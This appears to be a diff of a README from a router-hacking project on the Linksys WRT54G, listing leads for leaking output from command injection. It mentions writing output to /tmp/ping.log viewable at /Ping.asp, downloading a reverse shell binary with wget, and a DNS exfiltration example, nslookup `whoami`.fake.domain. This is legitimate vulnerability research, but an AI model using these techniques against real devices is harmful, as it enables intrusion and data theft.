elongl/linksys-wrt54g/README.md

 ### Leads for leaking command output
 - [x] Look for file paths that are displayed within the web interface that command output can be written to.
+  Using `/tmp/ping.log` to view the output at `/Ping.asp`.
 - [x] Use `wget` to download reverse shell binary to the router.
 - [ ] Config the attacker as the DNS server and force the router to issue DNS requests with the command output.
   Like ```nslookup `whoami`.fake.domain```